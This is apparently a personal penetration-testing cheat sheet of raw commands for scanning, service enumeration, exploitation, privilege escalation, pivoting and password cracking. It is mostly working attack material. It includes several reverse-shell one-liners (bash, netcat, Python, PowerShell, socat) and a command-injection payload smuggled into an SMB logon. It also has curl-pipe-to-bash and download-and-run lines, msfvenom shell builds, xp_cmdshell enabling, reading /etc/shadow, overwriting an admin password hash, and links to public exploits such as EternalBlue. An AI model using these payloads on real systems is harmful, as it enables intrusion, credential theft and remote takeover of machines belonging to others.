$ nmap -sC -sV -p- -Pn -A <IP address>
$ nmap -sC -sV -p- -Pn -A -sU <IP address>
$ nmap --top-ports=100 <IP address>
$ nmap <IP address> --script vuln

$ ftp <IP address> (anonymous:anonymous)
ftp> dir
ftp> get <file>
ftp> put <file>

$ ssh <user>@<IP address>

$ telnet <IP address>

$ tftp <IP address>
tftp> get <file>
tftp> put <file>

$ gobuster dir -w <wordlist> -u <URL>
$ gobuster dir -w <wordlist> -u <URL> -x php,html
$ gobuster vhost -w <wordlist> -u <URL>
$ ffuf -u <URL>/FUZZ -w <wordlist>
$ curl -I <URL>
$ curl <URL> -H 'User-Agentt: zerodiumsystem("curl <IP address>");'
$ feroxbuster -w <wordlist> -u <URL>
$ wfuzz -c -w <wordlist> -u http://FUZZ.<domain>
$ nikto -h <IP address>
$ curl -v -X OPTIONS <IP address>
$ curl http://<IP address> --upload-file test.txt
$ curl -X PUT http://<IP address>/test.txt -d @test.txt
$ curl -X PUT http://<IP address>/test.txt --data-binary @cmdasp.aspx 
$ curl -X PUT http://<IP address>/test.txt -d @cmdasp.aspx 
$ curl -X MOVE -H 'Destination:http://<IP address>/cmdasp.aspx' http://<IP address>/test.txt
$ davtest -url http://<IP address>
$ cadaver http://<IP address>
dav:/ put cmdasp.aspx cmdasp.txt
dav:/ put cmdasp.txt cmdasp.aspx

$ snmpwalk -v 2c -c <community string> <IP address>
$ snmpwalk -v 2c -c <community string> <IP address> .1.3.6.1.4.1.11.2.3.9.1.1.13.0

$ smbclient -L <IP address>
$ smbclient -L <IP address> -U <username>
$ smbclient \\\\<IP address>\\c$
$ smbclient \\\\<IP address>\\c$ -U <username>
$ smbmap -H <IP address>
$ smbmap -H <IP address> -u <username> -p <password>
smb: \> logon "/=`nc <IP address> <port> -e /bin/sh`"
msf> use auxiliary/scanner/smb/smb_version
msf> use exploit/windows/smb/ms17_010_eternalblue
msf> use exploit/windows/smb/ms08_067_netapi
msf> use exploit/multi/samba/usermap_script
$ enum4linux -a <IP address>
$ crackmapexec smb <IP address> --shares
$ crackmapexec smb <IP address> --shares -u <username> -p '<password>'
$ crackmapexec winrm <IP address> -u <username> -p '<password>'

$ cupsctl ErrorLog="/etc/shadow"
$ curl http://<IP address>:631/admin/log/error_log?
use multi/escalate/cups_root_file_read

$ rsync --list-only <IP address>::
$ rsync --list-only <IP address>::<share>
$ rsync <IP address>::<share>/<filename> <filename>

$ python3 mssqlclient.py <domain>/<username>@<IP address> -windows-auth
SQL> SELECT is_srvrolemember('sysadmin');
SQL> EXEC sp_configure 'show advanced options', 1; RECONFIGURE; sp_configure; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
SQL> EXEC xp_cmdshell "whoami";

$ mysql -h <IP address> -u root
MariaDB [(none)]> SHOW databases;
MariaDB [(none)]> USE <database name>;
MariaDB [(none)]> SHOW tables;
MariaDB [(none)]> SELECT * FROM <table name>;

$ xfreerdp /v:<IP address>
$ xfreerdp /v:<IP address> /u:Administrator
$ freerdp /v:<IP address> /cert:ignore /u:Administrator

$ psql -h <IP address> -U <username> -p <password>
<username>=# \l
<username>=# \c secrets
<username>=# \dt
<username>=# SELECT * FROM <table>;

$ evil-winrm -i <IP address> -u <username> -p <password>

$ redis-cli -h <IP address>
<IP address>:6379> select <db number e.g. 0>
<IP address>:6379> keys *
<IP address>:6379> get <key>

$ ./mongo mongodb://<IP address>:27017
> show dbs;
> use <db name>;
> show collections;
> db.<collection>.find().pretty();
$ mongo --port 27117 ace --eval "db.admin.find().forEach(printjson);"
$ mongo --port 27117 ace --eval 'db.admin.update({"_id":ObjectId("<Object ID>")},{$set:{"x_shadow":"<SHA-512 hash>"}})'

http://<domain name>/<page>?page=../../../../../../../../windows/system32/drivers/etc/hosts

sudo responder -I <network interface>
http://<domain name>/<page>?page=//<IP address>/somefile

${7*7}

http://<IP address>/data/0
http://<IP address>/data/1
http://<IP address>/data/2

http://<domain name>/shell.php?cmd=id
http://<domain name>/shell.php?cmd=curl%20<IP address>:8000/shell.sh|bash

$ sqlmap -u '<URL>' --cookie="PHPSESSID=<PHPSESSID>"
$ sqlmap -u '<URL>' --cookie="PHPSESSID=<PHPSESSID>" --os-shell

$ java -jar target/RogueJndi-1.1.jar --command "bash -c {echo,<base64 payload>} | {base64,-d}|{bash,-i}" --hostname "<IP address>"

http://<IP address>:<port>/manager/html
tomcat:s3cret
use exploit/multi/http/tomcat_mgr_upload

C:\ProgramData\Paessler\PRTG Network Monitor\PRTG Configuration.dat
https://github.com/shk0x/PRTG-Network-Monitor-RCE/blob/master/prtg-exploit.sh
use exploit/windows/http/prtg_authenticated_rce

$ ssh -L 1234:localhost:5432 <username>@<remote IP address>

$ ssh -D 1234 <username>@<remote IP address>

Edit /etc/proxychains4.conf
$ proxychains <command>

https://github.com/jpillora/chisel
$ sudo ./chisel server -p 8000 --reverse
$ ./chisel client <IP address>:8000 R:631:127.0.0.1:631

$ socat tcp-listen:9090,fork tcp:127.0.0.1:631 &

meterpreter> portfwd add -l 8082 -p 631 -r 127.0.0.1

$ python psexec.py <username>:<password>@<IP address>
$ python psexec.py <username>@<IP address>

$ sudo -l
$ sudo -u <user> /bin/bash

https://github.com/Anon-Exploiter/SUID3NUM

https://github.com/carlospolop/PEASS-ng

https://github.com/carlospolop/PEASS-ng

https://github.com/rebootuser/LinEnum

$ getcap -r / 2>/dev/null
CAP_SETUID

>>> import os
>>> os.setuid(0)
>>> os.system("/bin/bash")
$ python3 -c 'import os; os.setuid(0); os.system("/bin/bash")'

C:\> sc.exe config <service> binPath=C:\Windows\Temp\nc.exe -e cmd.exe <IP address> <port>"
C:\> sc.exe stop <service>
C:\> sc.exe start <service>

C:\> whoami /priv

https://github.com/AonCyberLabs/Windows-Exploit-Suggester
(On Kali) $ ./windows-exploit-suggester.py --update
$ install python-xlrd
$ pip install xlrd --upgrade

feed it "systeminfo" input, and point it to the microsoft database
$ ./windows-exploit-suggester.py --database 2014-06-06-mssb.xlsx --systeminfo win7sp1-systeminfo.txt 

msf> use post/multi/recon/local_exploit_suggester

$ hashid <hash>

$ john -w=/usr/share/wordlists/rockyou.txt hash.txt
$ john --show hashes.txt

$ hydra -L <usernames.txt> -p '<password>' <IP address> ssh

$ zip2john <ZIP file> > hashes.txt

$ hashcat -a 0 -m 0 hashes.txt <wordlist>

$ nc -nlvp 443 < file.txt
$ python -m SimpleHTTPServer 80
$ python3 -m http.server 8000
$ smbserver.py a /usr/share/windows-binaries/

$ nc -nv <IP address> 443 > file.txt
$ wget http://<IP address>:8000/exploit.sh
$ curl http://<IP address>:8000/exploit.sh | bash
C:\> copy \\<IP address>\a\whoami.exe C:\Windows\Temp\whoami.exe
C:\> powershell -c "(New-Object System.Net.WebClient).DownloadFile('http://<IP address>/exploit.exe','C:\Users\Offsec\Desktop\new-exploit.exe')"

$ bash -i
$ echo os.system('/bin/bash')
$ python -c 'import pty; pty.spawn("/bin/bash")'
$ python3 -c 'import pty;pty.spawn("/bin/bash")'
$ script /dev/null -c bash

$ CTRL+Z
$ stty raw -echo
$ fg
$ reset
$ export TERM=xterm-256color

$ nc -nv <IP address> <port> -e /bin/bash
$ rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <IP address> <port> >/tmp/f
$ bash -i >& /dev/tcp/10.0.0.1/8080 0>&1
$ python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
$ powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<IP address>',<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1
$ socat file:`tty`,raw,echo=0 tcp-listen:4444
$ socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<IP address>:4444
msf> use exploit/multi/handler

http://pentestmonkey.net/tools/web-shells/php-reverse-shell
Edit IP address and port

$ msfvenom -p php/reverse_php LHOST=<IP address> LPORT=<Port> -f raw > shell.php
$ msfvenom -p php/meterpreter_reverse_tcp LHOST=<IP address> LPORT=<Port> -f raw > shell.php
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP address> LPORT=<Port> -f asp > shell.asp
$ msfvenom -p windows/meterpreter/reverse_tcp LHOST=<IP address> LPORT=<Port> -f aspx > shell.aspx
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP Address> LPORT=<Port> -f raw > shell.jsp
$ msfvenom -p java/jsp_shell_reverse_tcp LHOST=<IP Address> LPORT=<Port> -f war > shell.war
$ msfvenom -p windows/shell_reverse_tcp LHOST=<IP Address> LPORT=<Port> -f exe -o shell.exe

https://www.speedguide.net/port.php?port=3389

https://crackstation.net/

https://lolbas-project.github.io/

https://gtfobins.github.io/

https://addons.mozilla.org/en-US/firefox/addon/wappalyzer/

https://addons.mozilla.org/en-US/firefox/addon/cookie-editor/

https://addons.mozilla.org/en-US/firefox/addon/foxyproxy-standard/

https://github.com/worawit/MS17-010/blob/master/zzz_exploit.py
$ ./zzz_exploit.py <IP address> ntsvcs
https://github.com/helviojunior/MS17-010/blob/master/send_and_execute.py
https://github.com/3ndG4me/AutoBlue-MS17-010

https://github.com/jivoi/pentest/blob/master/exploit_win/ms08-067.py

https://github.com/amriunix/CVE-2007-2447

https://github.com/flast101/php-8.1.0-dev-backdoor-rce

https://github.com/joeammond/CVE-2021-4034/blob/main/CVE-2021-4034.py